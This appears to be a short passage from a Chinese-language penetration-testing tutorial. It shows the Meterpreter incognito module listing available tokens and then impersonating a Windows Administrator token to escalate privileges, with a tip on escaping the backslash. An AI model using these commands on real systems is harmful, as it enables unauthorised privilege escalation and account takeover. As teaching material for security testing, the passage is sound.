use incognito
list_tokens -u
#显示可用的token
可以看见我们已经获取了一个系统管理员的授权令牌
WIN-GMDFGOL4157\Administrator
impersonate_token WIN-GMDFGOL4157\\Administrator
#在incognito中调用impersonate_token命令假冒administrator用户进行攻击
(注意在输入token时 中间是两个反斜杠 impersonate_token WIN-GMDFGOL4157**\\**Administrator )